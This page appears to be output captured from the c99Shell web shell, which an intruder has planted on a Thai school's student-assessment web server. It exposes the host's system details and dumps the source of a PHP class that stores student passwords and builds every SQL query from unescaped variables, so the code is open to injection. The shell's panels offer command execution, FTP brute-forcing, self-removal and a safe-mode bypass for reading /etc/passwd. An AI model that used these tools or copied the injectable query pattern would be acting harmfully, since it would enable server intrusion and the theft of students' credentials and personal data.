!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/eassess/class/   drwxr-xr-x
Free 52 GB of 127.8 GB (40.69%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     clsStudentAssess.php (15.66 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
//--Class StudentAssess--------------------------
//--PK of StudentAssess ::
//    1. studentId

class StudentAssess extends clsDB{

var 
$result;

var 
$studentId;
var 
$studentCode;
var 
$levelName;
var 
$programName;
var 
$prefixName;
var 
$studentName;
var 
$studentSurname;
var 
$studentPassword;
var 
$studentYear;

function 
StudentAssess(&$c){
    
$this->c=$c->c;
    
$this->DB=$c->db;
}

function 
Save(){
//--ข้อมูลในอ๊อบเจ๊กเป็นข้อมูลใหม่หรือข้อมูลเดิม --1:ข้อมูลใหม่  2:ข้อมูลเดิม
    
if ($this->status==1){
        
//uncomment a line below if your table use ID as running number
        //$this->studentId=$this->GetNextCode();
        
$sql "insert into StudentAssess values(
            '$this->studentId',
             '$this->studentCode',
             '$this->levelName',
             '$this->programName',
             '$this->prefixName',
             '$this->studentName',
             '$this->studentSurname',
             '$this->studentPassword',
             '$this->studentYear'
            )"
;
    }else {
        
$sql "update StudentAssess set 
            studentCode='$this->studentCode', 
            levelName='$this->levelName', 
            programName='$this->programName', 
            prefixName='$this->prefixName', 
            studentName='$this->studentName', 
            studentSurname='$this->studentSurname', 
            studentPassword='$this->studentPassword', 
            studentYear='$this->studentYear' 
            where studentId='$this->studentId'"
;
    }
    return 
$this->Dml($sql);
}

function 
Delete(){
//--ลบข้อมูลเดิมในอ๊อบเจ๊ก, เป็นการลบข้อมูลทีละ 1 เรคอร์ด
//--ต้องเรียกเมธอดตามลำดับดังนี้ SearchByKey()-->GetRecord()-->Delete()
    
return $this->Dml("delete from StudentAssess where studentId='$this->studentId'");
}

function 
GetNextCode(){
//--หาค่าสูงสุดของฟิลด์ที่ใช้เป็นคีย์ของตาราง ในลักษณะ auto increment
//--ต้องเป็นฟิลด์ชนิดตัวเลขจำนวนเต็มเท่านั้น และไม่ได้กำหนดรหัสเองทางจอภาพ
    
$this->SetQuery("select max(studentId) as num from StudentAssess");
    if (
$result=$this->GetResult()) {
        return 
$result['num']+1;
    }
}

function 
RSStudentAssess(){
//--เมธอดที่ขึ้นต้นด้วย RS (ResultSet) มีความหมายว่าจะได้รับข้อมูลกลับมาจากการ select มากกว่า 1 เรคอร์ด
//--จะต้องเรียกเมธอด GetRecord() ด้วยเสมอ นำข้อมูลจาก ResultSet เข้าอ๊อบเจ๊ก
//--โดยสามารถเพิ่มเมธอดได้ตามต้องการ แต่ต้องขึ้นต้นด้วย RS
    
$this->SetQuery("select * from StudentAssess order by studentId");
}

function 
GetRecord(){
//--นำข้อมูลจาก ResultSet มากำหนดให้กับแอตทริบิวต์ของอ๊อบเจ็ก
//--เรียก GetRecord() หนึ่งครั้ง จะเลื่อนตัวชี้เรคอร์ดไปอีกหนึ่งเรคอร์ด
    
if ($this->result $this->GetResult()) {
        
$this->studentId $this->result['studentId'];
        
$this->studentCode $this->result['studentCode'];
        
$this->levelName $this->result['levelName'];
        
$this->programName $this->result['programName'];
        
$this->prefixName $this->result['prefixName'];
        
$this->studentName $this->result['studentName'];
        
$this->studentSurname $this->result['studentSurname'];
        
$this->studentPassword $this->result['studentPassword'];
        
$this->studentYear $this->result['studentYear'];
        return 
1;
    }else {
        return 
0;
    }
}

function 
SearchByKey($xKey){
//--ค้นหาข้อมูลตาม PK ต้องระบุพารามิเตอร์ด้วย และต้องตามด้วยเมธอด GetRecord() เสมอ
    
if ($this->SetQuery("select * from StudentAssess where studentId= '$xKey'")){ 
        return 
1;
    }else {
        return 
0;
    }
}
//****************** You can add new functions below **********************//

function SearchByStCodeAndStudying($xKey){
    if (
$this->SetQuery("select * from StudentAssess where studentCode='$xKey'")){
        return 
1;
    }else {
        return 
0;
    }
}

function 
CountStdBystdYearAss($xstudentYear){
        
$this->SetQuery("select count(studentYear) as num  from StudentAssess  where studentYear = '$xstudentYear'");
        
$result $this->GetResult();
        return 
$result['num'];
}

function 
CountStdByProgramNameStdYearAss($xprogramName,$studentYear){
        
$this->SetQuery("select count(programName) as num  from StudentAssess  where programName = '$xprogramName' and studentYear = '$studentYear' ");
        
$result $this->GetResult();
        return 
$result['num'];
}

function 
CountStdByAcYSePgIdStdY($xacadYear$xsemester$xprogramName,$xstudentYear){
        
$this->SetQuery("SELECT count( DISTINCT (reg.studentId) ) as num
                                FROM eassess.Registration reg
                                JOIN eassess.ClassAssess ca ON reg.classId = ca.classId
                                JOIN eassess.StudentAssess sa ON reg.studentId = sa.studentId
                                WHERE reg.acadYear = '$xacadYear'
                                    AND reg.semester = '$xsemester'
                                    AND ca.studentYear = '$xstudentYear'
                                    AND ca.programId LIKE  '$xprogramName' "
);
        
$result $this->GetResult();
        return 
$result['num'];
// bank create - -/11/2552

function CountHstdRegis($xacadYear$xsemester$xstudentYear){
    
$cond '';
    
$cond.= ($xsemester!='%')? " AND reg.semester = '$xsemester'" '' ;
    
$cond.= ($xstudentYear!='%')? " AND ca.studentYear = '$xstudentYear'" '' ;
    
$sql "SELECT count( DISTINCT (reg.studentId) ) as num
            FROM eassess.Registration reg
            JOIN eassess.ClassAssess ca ON reg.classId = ca.classId
            JOIN eassess.StudentAssess sa ON reg.studentId = sa.studentId
            WHERE reg.acadYear = '$xacadYear'
            $cond "
;
//            echo $sql;
    
$this->SetQuery($sql);
    
$result $this->GetResult();
    return 
$result['num'];
// bank create - -/08/2553

function DeleteStudentAssess(){
    return 
$this->Dml("delete from StudentAssess");
}

// closeDate
function RSStudentAssessByStCodeAndStNameAndStSurname($stCode$stName$stSurname){
    
$this->SetQuery("select * from StudentAssess 
                                        where studentCode like '%$stCode%' and  studentName like '%$stName%' and  studentSurname like '%$stSurname%' 
                                        order by studentCode"
);
}

function 
RSStudentAssessGroupPgName(){
    
$this->SetQuery("select * from StudentAssess group by programName");
}

// start repCloseDateOfficer, Course
function GetNotAssessFlag0ByPgNameAndAcYAndSeAndCoIdAndDeIdAndOfId($pgName$acY$se$coId$deId$ofId){
    
$this->SetQuery("select distinct(tb1.studentCode), tb1.prefixName, tb1.studentName, tb1.studentSurname from 
                                        (
                                            select distinct(ci.officerId), s.* from StudentAssess s, Registration r, ClassAssess cl, ClassInStructorAssess ci 
                                            where s.programName = '$pgName'
                                            and s.studentId = r.studentId
                                            and r.acadYear = '$acY'
                                            and r.semester = '$se'
                                            and r.courseId = '$coId'
                                            and r.classId = cl.classId
                                            and cl.classId = ci.classId
                                            and ci.officerId = '$ofId'
                                        ) tb1
                                        LEFT JOIN (
                                            select * from DoAssessment 
                                            where defineid = '$deId'
                                            and courseId = '$coId'
                                            and officerId = '$ofId'
                                        ) tb2 
                                        ON tb1.studentId=tb2.studentId and tb1.officerId=tb2.officerId
                                        where tb2.studentId IS NULL and tb2.officerId IS NULL 
                                        order by tb1.studentCode"
);
}

function 
GetNotAssessFlag1ByPgNameAndAcYAndSeAndCoIdAndDeIdAndOfId($pgName$acY$se$coId$deId$ofId){
    
$this->SetQuery("select distinct(tb1.studentCode), tb1.prefixName, tb1.studentName, tb1.studentSurname from 
                                        (
                                            select distinct(ci.officerId), s.* from StudentAssess s, Registration r, ClassAssess cl, HoldCourse h, ClassInStructorAssess ci 
                                            where s.programName = '$pgName'
                                            and s.studentId = r.studentId
                                            and r.acadYear = '$acY'
                                            and r.semester = '$se'
                                            and r.courseId = '$coId'
                                            and r.classId = cl.classId
                                            and cl.classId = h.classId
                                            and h.defineid = '$deId'
                                            and cl.classId = ci.classId
                                            and ci.officerId = '$ofId'
                                        ) tb1
                                        LEFT JOIN (
                                            select * from DoAssessment 
                                            where defineid = '$deId'
                                            and courseId = '$coId'
                                            and officerId = '$ofId'
                                        ) tb2 
                                        ON tb1.studentId=tb2.studentId and tb1.officerId=tb2.officerId
                                        where tb2.studentId IS NULL and tb2.officerId IS NULL 
                                        order by tb1.studentCode"
);
}

function 
GetNotAssessFlag5ByPgNameAndAcYAndSeAndCoIdAndDeId($pgName$acY$se$coId$deId){
    
$this->SetQuery("select distinct(tb1.studentCode), tb1.prefixName, tb1.studentName, tb1.studentSurname from 
                                        (
                                            select distinct(r.classId), s.* from StudentAssess s, Registration r 
                                            where s.programName = '$pgName'
                                            and s.studentId = r.studentId
                                            and r.acadYear = '$acY'
                                            and r.semester = '$se'
                                            and r.courseId = '$coId'
                                        ) tb1
                                        LEFT JOIN (
                                            select * from DoAssessment 
                                            where defineid = '$deId'
                                            and courseId = '$coId'
                                            and officerId = 0
                                        ) tb2 
                                        ON tb1.studentId=tb2.studentId and tb1.classId=tb2.classId
                                        where tb2.studentId IS NULL and tb2.classId IS NULL 
                                        order by tb1.studentCode"
);
}

function 
GetNotAssessFlag6ByPgNameAndAcYAndSeAndCoIdAndDeId($pgName$acY$se$coId$deId){
    
$this->SetQuery("select distinct(tb1.studentCode), tb1.prefixName, tb1.studentName, tb1.studentSurname from 
                                        (
                                            select distinct(h.classId), s.* from StudentAssess s, Registration r, ClassAssess cl, HoldCourse h 
                                            where s.programName = '$pgName'
                                            and s.studentId = r.studentId
                                            and r.acadYear = '$acY'
                                            and r.semester = '$se'
                                            and r.courseId = '$coId'
                                            and r.classId = cl.classId
                                            and cl.classId = h.classId
                                            and h.defineid = '$deId'
                                        ) tb1
                                        LEFT JOIN (
                                            select * from DoAssessment 
                                            where defineid = '$deId'
                                            and courseId = '$coId'
                                            and officerId = 0
                                        ) tb2 
                                        ON tb1.studentId=tb2.studentId and tb1.classId=tb2.classId
                                        where tb2.studentId IS NULL and tb2.classId IS NULL 
                                        order by tb1.studentCode"
);
}
// end repCloseDateOfficer, Course

// start repCloseDateAssessForm
function GetNotAssessFlag0ByPgNameAndAcYAndSeAndDeId($pgName$acY$se$deId){
    
$this->SetQuery("select distinct(tb1.studentCode), tb1.prefixName, tb1.studentName, tb1.studentSurname from 
                                        (
                                            select distinct(ci.officerId), s.* from StudentAssess s, Registration r, ClassAssess cl, ClassInStructorAssess ci 
                                            where s.programName = '$pgName'
                                            and s.studentId = r.studentId
                                            and r.acadYear = '$acY'
                                            and r.semester = '$se'
                                            and r.classId = cl.classId
                                            and cl.classId = ci.classId
                                        ) tb1
                                        LEFT JOIN (
                                            select * from DoAssessment 
                                            where defineid = '$deId'
                                        ) tb2 
                                        ON tb1.studentId=tb2.studentId and tb1.officerId=tb2.officerId
                                        where tb2.studentId IS NULL and tb2.officerId IS NULL 
                                        order by tb1.studentCode"
);
}

function 
GetNotAssessFlag1ByPgNameAndAcYAndSeAndDeId($pgName$acY$se$deId){
    
$this->SetQuery("select distinct(tb1.studentCode), tb1.prefixName, tb1.studentName, tb1.studentSurname from 
                                        (
                                            select distinct(ci.officerId), s.* from StudentAssess s, Registration r, ClassAssess cl, HoldCourse h, ClassInStructorAssess ci 
                                            where s.programName = '$pgName'
                                            and s.studentId = r.studentId
                                            and r.acadYear = '$acY'
                                            and r.semester = '$se'
                                            and r.classId = cl.classId
                                            and cl.classId = h.classId
                                            and h.defineid = '$deId'
                                            and cl.classId = ci.classId
                                        ) tb1
                                        LEFT JOIN (
                                            select * from DoAssessment 
                                            where defineid = '$deId'
                                        ) tb2 
                                        ON tb1.studentId=tb2.studentId and tb1.officerId=tb2.officerId
                                        where tb2.studentId IS NULL and tb2.officerId IS NULL 
                                        order by tb1.studentCode"
);
}

function 
GetNotAssessFlag5ByPgNameAndAcYAndSeAndDeId($pgName$acY$se$deId){
    
$this->SetQuery("select distinct(tb1.studentCode), tb1.prefixName, tb1.studentName, tb1.studentSurname from 
                                        (
                                            select distinct(r.classId), s.* from StudentAssess s, Registration r 
                                            where s.programName = '$pgName'
                                            and s.studentId = r.studentId
                                            and r.acadYear = '$acY'
                                            and r.semester = '$se'
                                        ) tb1
                                        LEFT JOIN (
                                            select * from DoAssessment 
                                            where defineid = '$deId'
                                            and officerId = 0
                                        ) tb2 
                                        ON tb1.studentId=tb2.studentId and tb1.classId=tb2.classId
                                        where tb2.studentId IS NULL and tb2.classId IS NULL 
                                        order by tb1.studentCode"
);
}

function 
GetNotAssessFlag6ByPgNameAndAcYAndSeAndDeId($pgName$acY$se$deId){
    
$this->SetQuery("select distinct(tb1.studentCode), tb1.prefixName, tb1.studentName, tb1.studentSurname from 
                                        (
                                            select distinct(h.classId), s.* from StudentAssess s, Registration r, HoldCourse h 
                                            where s.programName = '$pgName'
                                            and s.studentId = r.studentId
                                            and r.acadYear = '$acY'
                                            and r.semester = '$se'
                                            and r.classId = h.classId
                                            and h.defineid = '$deId'
                                        ) tb1
                                        LEFT JOIN (
                                            select * from DoAssessment 
                                            where defineid = '$deId'
                                            and officerId = 0
                                        ) tb2 
                                        ON tb1.studentId=tb2.studentId and tb1.classId=tb2.classId
                                        where tb2.studentId IS NULL and tb2.classId IS NULL 
                                        order by tb1.studentCode"
);
}

function 
GetNotAssessFlag2ByPgNameAndDeId($pgName$deId){
    
$this->SetQuery("select distinct(tb1.studentCode), tb1.prefixName, tb1.studentName, tb1.studentSurname from 
                                        (
                                            select s.* from StudentAssess s, HoldStudent h 
                                            where s.programName = '$pgName'
                                            and s.studentYear = h.stdYearAss
                                            and h.defineid = '$deId'
                                        ) tb1
                                        LEFT JOIN (
                                            select * from DoAssessmentHStd 
                                            where defineid = '$deId'
                                        ) tb2 
                                        ON tb1.studentId=tb2.studentId and tb1.studentYear=tb2.stdYearAss
                                        where tb2.studentId IS NULL and tb2.stdYearAss IS NULL 
                                        order by tb1.studentCode"
);
}

function 
GetNotAssessFlag3ByPgNameAndDeIdAndPgId($pgName$deId$pgId){
    
$this->SetQuery("select distinct(tb1.studentCode), tb1.prefixName, tb1.studentName, tb1.studentSurname from 
                                        (
                                            select s.* from StudentAssess s, HoldProgram h 
                                            where s.programName = '$pgName'
                                            and s.studentYear = h.stdYearAss
                                            and h.defineid = '$deId'
                                            and h.programId = '$pgId'
                                        ) tb1
                                        LEFT JOIN (
                                            select * from DoAssessmentHStd 
                                            where defineid = '$deId'
                                        ) tb2 
                                        ON tb1.studentId=tb2.studentId and tb1.studentYear=tb2.stdYearAss
                                        where tb2.studentId IS NULL and tb2.stdYearAss IS NULL 
                                        order by tb1.studentCode"
);
}
// end repCloseDateAssessForm

function GetNotAssessFlag7ByPgNameAndAcYAndSeAndDeId($pgName$acY$se$deId){
    
$this->SetQuery("select distinct(tb1.studentCode), tb1.prefixName, tb1.studentName, tb1.studentSurname from 
                    (
                    select distinct(tt.ttOfId) as officerId, tt.ttId, s.* from StudentAssess s, Registration r, ClassAssess cl, HoldCourse h, TimetableAssess tt 
                    where s.programName = '$pgName'
                        and s.studentId = r.studentId
                        and r.acadYear = '$acY'
                        and r.semester = '$se'
                        and r.classId = cl.classId
                        and cl.classId = h.classId
                        and h.defineid = '$deId'
                        and h.ttId = tt.ttId
                    ) tb1
                    LEFT JOIN (
                    select * from DoAssessment 
                    where defineid = '$deId'
                    ) tb2 
                    ON tb1.studentId=tb2.studentId and tb1.officerId=tb2.officerId and tb1.ttId=tb2.ttId
                    where tb2.studentId IS NULL and tb2.officerId IS NULL and tb2.ttId IS NULL 
                    order by tb1.studentCode"
);
}

//--End class StudentAssess--

?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0162 ]--